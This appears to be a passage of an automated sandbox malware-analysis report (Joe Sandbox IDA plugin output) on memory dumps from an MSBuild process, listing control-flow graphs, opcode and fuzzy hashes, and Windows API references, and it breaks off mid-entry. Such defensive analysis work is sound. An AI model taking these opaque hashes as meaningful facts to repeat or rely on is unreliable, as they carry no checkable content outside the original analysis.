                            • API String ID: 10892065-3044919918
                            • Opcode ID: db3bb07c46948f68df0ccaca921cab19940f3fe5ab25339d7cf37772e9360f96
                            • Instruction ID: 4de63186feade1776668f38d02d92072f368d2fc12e83a13d79ba8d59b7e62a5
                            • Opcode Fuzzy Hash: db3bb07c46948f68df0ccaca921cab19940f3fe5ab25339d7cf37772e9360f96
                            • Instruction Fuzzy Hash: C34166B8D052589FCF00CFA9D984A9EFBB5BB49310F24A01AE819B7310D335A945CF68

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1283 5993310-5993322 1284 5993328-5993339 1283->1284 1285 59934ad-59934d9 1283->1285 1288 599333f-5993388 1284->1288 1289 59934e0-5993518 1284->1289 1285->1289 1316 599338a-599338e 1288->1316 1317 5993394-59933bb 1288->1317 1293 5993838-5993864 1289->1293 1294 599351e-5993525 1289->1294 1315 599386b-5993897 1293->1315 1297 5993547-599355c 1294->1297 1298 5993527-5993545 1294->1298 1305 599382e-5993835 1297->1305 1298->1297 1304 5993561-59935b3 1298->1304 1318 59935bd-59935bf 1304->1318 1319 59935b5-59935b8 1304->1319 1336 599389e-59938d7 1315->1336 1316->1317 1320 5993496-59934aa 1316->1320 1332 59933bd-59933bf 1317->1332 1333 59933c1 1317->1333 1321 599372e-599373b 1318->1321 1322 59935c5-59935ca 1318->1322 1319->1305 1321->1315 1325 5993741-5993743 1321->1325 1328 59935d3-59935d5 1322->1328 1330 5993752-5993758 1325->1330 1331 5993745-599374a 1325->1331 1334 5993728-599372c 1328->1334 1335 59935db-59935e0 1328->1335 1330->1336 1337 599375e-5993766 1330->1337 1331->1330 1338 59933c8-59933da 1332->1338 1333->1338 1334->1321 1339 59935fa-59935ff 1335->1339 1340 59935e2-59935f5 1335->1340 1350 59938d9 1336->1350 1351 59938e0-59938e3 1336->1351 1342 5993768-599376c 1337->1342 1343 599379e-59937a2 1337->1343 1372 59933dc-59933e0 1338->1372 1373 59933f5-59933f7 1338->1373 1339->1321 1347 5993605-599360d 1339->1347 1340->1305 1348 599376e-5993781 1342->1348 1349 5993786-5993799 1342->1349 1345 59937a8 1343->1345 1346 59937a4-59937a6 1343->1346 1353 59937ad-59937af 1345->1353 1346->1353 1356 599360f-5993611 1347->1356 1357 5993685-5993687 1347->1357 1348->1305 1349->1305 1350->1351 1363 599399d-59939a3 1350->1363 1364 5993921-599392d 1350->1364 1365 59938f3-59938fd 1350->1365 1366 5993902-5993908 1350->1366 1367 5993932-599393e 1350->1367 1368 5993962-5993968 1350->1368 1369 5993943-599394c 1351->1369 1370 59938e5-59938e8 1351->1370 1374 59937b1-59937c4 1353->1374 1375 59937c6-59937db 1353->1375 1358 5993613-5993615 1356->1358 1359 5993617-5993619 1356->1359 1361 5993689-599369a 1357->1361 1362 599369f-59936a3 1357->1362 1382 599367d-5993683 1358->1382 1383 5993628-599362e 1359->1383 1384 599361b-5993620 1359->1384 1361->1305 1362->1321 1376 59936a9-59936ab 1362->1376 1377 59939ab-59939b7 1363->1377 1378 59939a5 1363->1378 1387 59939c2-59939cb 1364->1387 1365->1387 1388 599390a 1366->1388 1389 5993910-599391c 1366->1389 1367->1387 1392 599396a 1368->1392 1393 5993970-599397c 1368->1393 1390 599394e 1369->1390 1391 5993954-5993960 1369->1391 1385 599397e-5993987 1370->1385 1386 59938ee-59939bf 1370->1386 1372->1373 1379 59933e2-59933eb 1372->1379 1380 5993419-599341b 1373->1380 1381 59933f9-5993400 1373->1381 1374->1305 1411 59937dd-599381a 1375->1411 1412 599381c-5993829 1375->1412 1397 59936ad-59936af 1376->1397 1398 599371e-5993724 1376->1398 1377->1387 1378->1377 1443 59933ed call 5993301 1379->1443 1444 59933ed call 5993310 1379->1444 1403 599341d-5993444 1380->1403 1404 599348c-5993493 1380->1404 1400 5993409 1381->1400 1401 5993402-5993407 1381->1401 1382->1356 1382->1357 1383->1336 1405 5993634-5993640 1383->1405 1384->1383 1394 5993989 1385->1394 1395 599398f-599399b 1385->1395 1388->1389 1389->1387 1390->1391 1391->1387 1392->1393 1393->1387 1394->1395 1395->1387 1407 59936be-59936c4 1397->1407 1408 59936b1-59936b6 1397->1408 1398->1376 1413 5993726 1398->1413 1410 599340e-5993417 1400->1410 1401->1410 1427 599344a-5993451 1403->1427 1428 5993446-5993448 1403->1428 1414 599364f-5993655 1405->1414 1415 5993642-5993647 1405->1415 1407->1336 1416 59936ca-59936d6 1407->1416 1408->1407 1409 59933f3 1409->1373 1410->1380 1411->1412 1412->1305 1413->1321 1414->1336 1418 599365b-5993670 1414->1418 1415->1414 1419 59936d8-59936dd 1416->1419 1420 59936e5-59936eb 1416->1420 1429 5993672-5993675 1418->1429 1430 5993677-5993679 1418->1430 1419->1420 1420->1336 1423 59936f1-5993706 1420->1423 1423->1398 1434 5993708-5993719 1423->1434 1432 5993453-599348a 1427->1432 1428->1432 1429->1382 1430->1382 1433 599367b 1430->1433 1432->1404 1433->1382 1434->1305 1443->1409 1444->1409
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID: 7
                            • API String ID: 0-1790921346
                            • Opcode ID: 888c67f3fbcab59614a518d7a0e4f5aedd9ef85dbcb79ab8223f583d8b569272
                            • Instruction ID: e672fc9d9fbc0cf8b7968d132bc49a33a4c712a93b78d100ca0e3f9e8ca38e0d
                            • Opcode Fuzzy Hash: 888c67f3fbcab59614a518d7a0e4f5aedd9ef85dbcb79ab8223f583d8b569272
                            • Instruction Fuzzy Hash: 9C228E756003059FDF18DF69C884BAEBBB6FF88310F648869E5069B394DB35E841CB90

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1602 59dc7c8-59dc7ea 1603 59dc7ec 1602->1603 1604 59dc7f1-59dc868 LdrInitializeThunk 1602->1604 1603->1604 1606 59dc94c-59dc955 1604->1606 1607 59dc86d-59dc876 1606->1607 1608 59dc95b-59dc977 1606->1608 1609 59dc87d-59dc8a1 1607->1609 1610 59dc878 1607->1610 1612 59dc979-59dc9ba 1608->1612 1613 59dc9bb-59dc9c2 1608->1613 1615 59dc8eb-59dc949 1609->1615 1616 59dc8a3-59dc8ea 1609->1616 1610->1609 1612->1613 1615->1606 1616->1615
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 6ef7344b16b4df72223f7d6db940bd2edaf8816627e5bc8879d79c4ddefc85a1
                            • Instruction ID: 3ad1bf9bfe2d0f8f074124e14de67b93de50771a8d0548296c8d6f54738246b3
                            • Opcode Fuzzy Hash: 6ef7344b16b4df72223f7d6db940bd2edaf8816627e5bc8879d79c4ddefc85a1
                            • Instruction Fuzzy Hash: E3716B78E052089FCB54DFA9D584A9EBBF2BF88300F20916AE815AB354D731AD41CF54
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: e49128aa0da47801f9d7f54b85b5e3a7e611c5504911ec36449b9f9c1f39f157
                            • Instruction ID: 524ae00b7aa39506eedf911ff9b6f31e6ebf9b273376e7020b393484932071f1
                            • Opcode Fuzzy Hash: e49128aa0da47801f9d7f54b85b5e3a7e611c5504911ec36449b9f9c1f39f157
                            • Instruction Fuzzy Hash: 7841C074E04208DBDB18CFAAD584ADEFBF6BF89310F14D129E408A7355DB349846CBA4
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 21afcd3b3959de051effbab0888c4a63c6fa2aa3e839ec7b59228e3040f699c9
                            • Instruction ID: 7f2ba7929aad4a2ff08df7ca562df86b6e8b7933e1f77e85dd3a9a8bf9298766
                            • Opcode Fuzzy Hash: 21afcd3b3959de051effbab0888c4a63c6fa2aa3e839ec7b59228e3040f699c9
                            • Instruction Fuzzy Hash: 7C418074E05208DFDB18DFA9D984ADEBBB2AF89300F209129E415BB364EB359845CB54
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 48295cf54726b4e2255d313348a45d4e1d80c5f2f5cd0cd19d6e374f6980301d
                            • Instruction ID: 131b041f6478bd2785bc058b50720ee3f9e63f70a820c47f2aadacba4e0ffda0
                            • Opcode Fuzzy Hash: 48295cf54726b4e2255d313348a45d4e1d80c5f2f5cd0cd19d6e374f6980301d
                            • Instruction Fuzzy Hash: 0841C274E05208DFDB14DFA9D984ADEBBB2BF89300F10912AE414BB364EB359842CB54
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 0f041f06b4946a2dfca73f1e64da092b37dc12d81d5de05e1e71f5ba6b897d6f
                            • Instruction ID: df31a5a099ee7fe6b29e42bcc369f901feea4565e24d4ce4a97615d36caf4a84
                            • Opcode Fuzzy Hash: 0f041f06b4946a2dfca73f1e64da092b37dc12d81d5de05e1e71f5ba6b897d6f
                            • Instruction Fuzzy Hash: 4441AE75E052089FDB14CFAAD484ADEFBF2BF88310F24816AE814A7365DB359941CF60
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID: &
                            • API String ID: 0-1010288
                            • Opcode ID: a04a6dd459e9ba4cc1c2a667954f225e1daf8fdd04b69374c6070958bd91f42a
                            • Instruction ID: 68fdf283371ad4af532af8a0bfebab8548d70d9e356736c4b16a9412abe60146
                            • Opcode Fuzzy Hash: a04a6dd459e9ba4cc1c2a667954f225e1daf8fdd04b69374c6070958bd91f42a
                            • Instruction Fuzzy Hash: 09B16938714202AFCF1DAF69A59553A7BE7BFC42013088969E8079B785DF34ED01CBA1
                            APIs
                            • KiUserExceptionDispatcher.NTDLL ref: 00EBB8E4
                            Memory Dump Source
                            • Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd
                            Similarity
                            • API ID: DispatcherExceptionUser
                            • String ID:
                            • API String ID: 6842923-0
                            • Opcode ID: 8287b8df531b0e7fbe9636e93f5059fd074ad904128cc11edd3a0a104adcc379
                            • Instruction ID: cebb6951798107ea3082f4fc37eb9dd5d762c9c6f5c2b133a4e50f15e223f149
                            • Opcode Fuzzy Hash: 8287b8df531b0e7fbe9636e93f5059fd074ad904128cc11edd3a0a104adcc379
                            • Instruction Fuzzy Hash: C911CEB4D05219EFDB04DFA9D4496EEBBF4AB48300F1094AA9818B3350EB740B84DF90
                            APIs
                            • KiUserExceptionDispatcher.NTDLL ref: 00EBB8E4
                            Memory Dump Source
                            • Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd
                            Similarity
                            • API ID: DispatcherExceptionUser
                            • String ID:
                            • API String ID: 6842923-0
                            • Opcode ID: dc2e0b1b9afb21e08204e8beba75191f9ac2424340a9b1a80bd98d65a32e606c
                            • Instruction ID: ce14f91164e7a291dc7eb93101cbbab840e6ea1b7a9db83ecd1574efa10f1bd2
                            • Opcode Fuzzy Hash: dc2e0b1b9afb21e08204e8beba75191f9ac2424340a9b1a80bd98d65a32e606c
                            • Instruction Fuzzy Hash: 290188B0C093889FCB01CFA9C9042EEBFF1AF46300F1486AAC854A32A1D7780A46DB10
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID: U
                            • API String ID: 0-3372436214
                            • Opcode ID: ed59a0645bb757e3eef130c77e7fee8be3e2d2f5a2638983b261a7c59fce7147
                            • Instruction ID: 38cd7696020536aed562568256675e838d77ff8db26b088d759edfd4149fd9fb
                            • Opcode Fuzzy Hash: ed59a0645bb757e3eef130c77e7fee8be3e2d2f5a2638983b261a7c59fce7147
                            • Instruction Fuzzy Hash: 6B71A130B08314CBD724CB28D4597797BA2FB81311F04896AF817ABB89CB3CDD4A9752
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: cd6ff8f2c1955268f13ff873a6f8e2a16a3dbf62fb4d1208f921c7bac5b4345a
                            • Instruction ID: d5434099e103eb5c05980a44479dddee112c16bffff34d2e513ca89aad320fd1
                            • Opcode Fuzzy Hash: cd6ff8f2c1955268f13ff873a6f8e2a16a3dbf62fb4d1208f921c7bac5b4345a
                            • Instruction Fuzzy Hash: 36517E75E002159FCF09CF68C885AEEBBF6FF88210F148466E805AB251E730DD40CBA0
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: e5aecf3ed948f17a7cb16d17e966b7aef05d82eea1491c2893c0e08ccf365aba
                            • Instruction ID: 3bf6f920492b90fba4d0e20451cfc42b5da663e6a5264fa597a02c7d235831cd
                            • Opcode Fuzzy Hash: e5aecf3ed948f17a7cb16d17e966b7aef05d82eea1491c2893c0e08ccf365aba
                            • Instruction Fuzzy Hash: 1D517F75A002099FDB15CF69C584EAEBFFABF88310F198465E905AB352D730ED45CBA0
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID: 7
                            • API String ID: 0-1790921346
                            • Opcode ID: 29bb1f61764c85d637b141cf1bcbd6d83d68c7d9afb2fca3a7c6d8f04c53c434
                            • Instruction ID: 3699d4739ed35be632b7993787aba3ad935bb4cad25dbcb357ea2caf6bec4e30
                            • Opcode Fuzzy Hash: 29bb1f61764c85d637b141cf1bcbd6d83d68c7d9afb2fca3a7c6d8f04c53c434
                            • Instruction Fuzzy Hash: F0416A74700311DFDB29DF29C884A2AB7B6FF89320B65C969D8458B366DB31EC46CB50
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID: "
                            • API String ID: 0-123907689
                            • Opcode ID: cf1e79f94a7831f5f40ab4530a8bab217d9bc7e4dc5bfad5f1c7518fdf430eb3
                            • Instruction ID: a3466dcc1e1ed25f067c50b6a57286389ec86b39a6b2efcc7ae6220ea91889ee
                            • Opcode Fuzzy Hash: cf1e79f94a7831f5f40ab4530a8bab217d9bc7e4dc5bfad5f1c7518fdf430eb3
                            • Instruction Fuzzy Hash: 06413935725612CFCB4C9B68D15983D3BE6BB8A2413050999E807DB7A1CF38EE01DB56
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID: U
                            • API String ID: 0-3372436214
                            • Opcode ID: 1427dfed2c2a77b8e4867fbb4d8c388518ff659ef9c038e68a61109e3ab7a691
                            • Instruction ID: 1ab9e7367847be84cf534f656a69ee4b24bed125c9084d53fdc7d34ea6d6f63e
                            • Opcode Fuzzy Hash: 1427dfed2c2a77b8e4867fbb4d8c388518ff659ef9c038e68a61109e3ab7a691
                            • Instruction Fuzzy Hash: 4B319A34600315DFC754CF24D48DA6EBBF2FF84321B18C669E82A9B251CB34E949DB90
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: f9192126e6bb3cf540ecb791e6a2466f84366f1cec44e835cb0f2bbac1e3818a
                            • Instruction ID: e94c5a9ebe8555109979e3c10a1cd392c303ead48fac3fd4f4cccca130104966
                            • Opcode Fuzzy Hash: f9192126e6bb3cf540ecb791e6a2466f84366f1cec44e835cb0f2bbac1e3818a
                            • Instruction Fuzzy Hash: 70218376A002199FDF15CF69C885EEEBBBAFF88210F098425E914D7251D730D941CB90
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c97958e1173a1dc4cec267e0cfc93efe82d437462385f32f04dd7e7e66ba1978
                            • Instruction ID: ac792bd2f7e3a053ad936a1a7b10214a346adbc567746274d2ef83873977c85b
                            • Opcode Fuzzy Hash: c97958e1173a1dc4cec267e0cfc93efe82d437462385f32f04dd7e7e66ba1978
                            • Instruction Fuzzy Hash: 64423C74A042459FCB18DF68C984EAEBBF2FF89310F558599E845AB361D730ED41CBA0
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 67cc19530ea80bc89586bbc08045261837009c7c76996e2f1af7fa1ba1a7ae87
                            • Instruction ID: 7eacd78ff66bb7c19a4251fb67ada2a1e9c98549e3075a65b00f2dca887972cc
                            • Opcode Fuzzy Hash: 67cc19530ea80bc89586bbc08045261837009c7c76996e2f1af7fa1ba1a7ae87
                            • Instruction Fuzzy Hash: 052248347006118FDB14DF39C488A6ABBF6FF89700B1584A9E90ACB366DB31EC45CB61
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6075b7778f52b780513b183d792d16dde7d5539700334361ca0685e725e3a66a
                            • Instruction ID: 9bd19e009c8d2b9d03837b31b66c8febe45bfd5fce2c5589558e7f3bbbfa0657
                            • Opcode Fuzzy Hash: 6075b7778f52b780513b183d792d16dde7d5539700334361ca0685e725e3a66a
                            • Instruction Fuzzy Hash: 65122870A10205CFDB59DF68C484A6ABBF7FF88301B548469E81ADB395DB75EC41CB90
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bc30721e8ba3254e66bb0f80c521b82da4b78c54a4db8e2ebe64e03e3873c1a2
                            • Instruction ID: 6db1a7fd1258bfad91aadff8f962f0ac78782630b0008d22128ac1d51ab2a846
                            • Opcode Fuzzy Hash: bc30721e8ba3254e66bb0f80c521b82da4b78c54a4db8e2ebe64e03e3873c1a2
                            • Instruction Fuzzy Hash: CDE15C74B047268BDB11EF68D990A6E77FAFF84700F548529D806DB388EB34DC418BA1
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 68ed10f54e0d2150363b71449fac1250fad178caebf0b4f84946f72750cdaeac
                            • Instruction ID: bafce203acf85ae3779de12de8055f6386c5e5178da83e1d049c97182be35a43
                            • Opcode Fuzzy Hash: 68ed10f54e0d2150363b71449fac1250fad178caebf0b4f84946f72750cdaeac
                            • Instruction Fuzzy Hash: D9E13B34B002059FDB18EF68D498A6DBBB6FF88310F548469E906DB395DB35DD42CBA0
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3764dce53ee0655f74183495e9000e245bc50035f7f5c5257e7c37a57feba3a4
                            • Instruction ID: b8968f08d5c896c9116e5c45bf4ce73d168fbc6ee2c5425d310016bff6ce70eb
                            • Opcode Fuzzy Hash: 3764dce53ee0655f74183495e9000e245bc50035f7f5c5257e7c37a57feba3a4
                            • Instruction Fuzzy Hash: 79D19131B093269FDB219B68884077ABBF7BF88A10F55495AE806DB359DB30DC41CBD1
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3c6d98fd61c0ba6eb4117ddfa2ed26943c4762d7b57d8da7856cd9db8a5ce9eb
                            • Instruction ID: bb1570d149efdcad6890b3e2e1e77cce48f09b411250329d4481f8fa8cb0b427
                            • Opcode Fuzzy Hash: 3c6d98fd61c0ba6eb4117ddfa2ed26943c4762d7b57d8da7856cd9db8a5ce9eb
                            • Instruction Fuzzy Hash: F9E13A75B002158FDB18DF68C984AADBBF6FF88310B5585A9E905EB361DB30EC41CB90
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 38c2bd8a3f197e01fc5cb23ddf228758be1d13c6e0238174c8e2d313cc569de4
                            • Instruction ID: 5c4389dd060dc52fb0527713c7e4c63e43f878816b174ebd27f3f02ce382e2ff
                            • Opcode Fuzzy Hash: 38c2bd8a3f197e01fc5cb23ddf228758be1d13c6e0238174c8e2d313cc569de4
                            • Instruction Fuzzy Hash: C4D13B35B00215DFDB14DF68D588AAEBBF6FF88210B158469E806DB3A6DB31EC41CB50
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c9dc6762ac184ee01c84b997d95bcdd7ab0420af8cd13fc77bcc11ddaf0c12ca
                            • Instruction ID: c9ea5604b67fea565cd560f2a001a7e2de85891c88d10bb783f35ad0ae87ae19
                            • Opcode Fuzzy Hash: c9dc6762ac184ee01c84b997d95bcdd7ab0420af8cd13fc77bcc11ddaf0c12ca
                            • Instruction Fuzzy Hash: F3A1F8703202028BEF086B2D98A57BD766BFFC5601F544524EE06CF3DADE615D0AD3A5
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5c2c80acc610532d62fd025744dc172eb87646c969a0f2a453f3f82a2f913541
                            • Instruction ID: 8faf5c8283293b5830727211b2b97ec9cd525194af062442ffa3dd4dfa317b29
                            • Opcode Fuzzy Hash: 5c2c80acc610532d62fd025744dc172eb87646c969a0f2a453f3f82a2f913541
                            • Instruction Fuzzy Hash: D9B138387006148FCB14DF39D488A6ABBF6FF89705B5544A9E44ADB366DB30EC05CB61
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ebeced8e804fe4fd69aeb26b392bd6fbf245a0991901dac9e0608c07144da746
                            • Instruction ID: 070f1a0b1e8c233b2eeb5b8faf3e4528f6be66bb016e5a66f5333fffd99da9db
                            • Opcode Fuzzy Hash: ebeced8e804fe4fd69aeb26b392bd6fbf245a0991901dac9e0608c07144da746
                            • Instruction Fuzzy Hash: 9FB1E534A01218AFDF19CFA8D584A9DBBF6BF88310F24C159E805AB355C771ED46CB90
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 706dcac44e89db238e2fb1c6f52ca0180ed501a30a12ec2342a9995155a27c2a
                            • Instruction ID: b9f9f0d172cd99c8487dbdbe24ac367746f7146262d5bf0e1f036141f3e331d3
                            • Opcode Fuzzy Hash: 706dcac44e89db238e2fb1c6f52ca0180ed501a30a12ec2342a9995155a27c2a
                            • Instruction Fuzzy Hash: E4A12C34A102159FDB18DFA5D954AAEBBB6FF88700B248519D906DB369DB30ED02CB90
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 11b651df54e46a4e828fac66a4957625875c4284bcf8137e867097ef24cb8e09
                            • Instruction ID: a7bbc86782a185863c070a885b71f325646b0edb161c72212756402b7659d170
                            • Opcode Fuzzy Hash: 11b651df54e46a4e828fac66a4957625875c4284bcf8137e867097ef24cb8e09
                            • Instruction Fuzzy Hash: 04A15B34B102059FDF18DFA8D498AAE7BFABF88300F148459E8069B391DB35DD41CBA0
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 03626f3acb0761f5255f0d93734c8c10a818bb0ec98cc84ad186544c28c6a45a
                            • Instruction ID: 5c51e50ae1457a6a329b3c309476ed5a2bbfe7c032c6df1e3fed3c452a4464ca
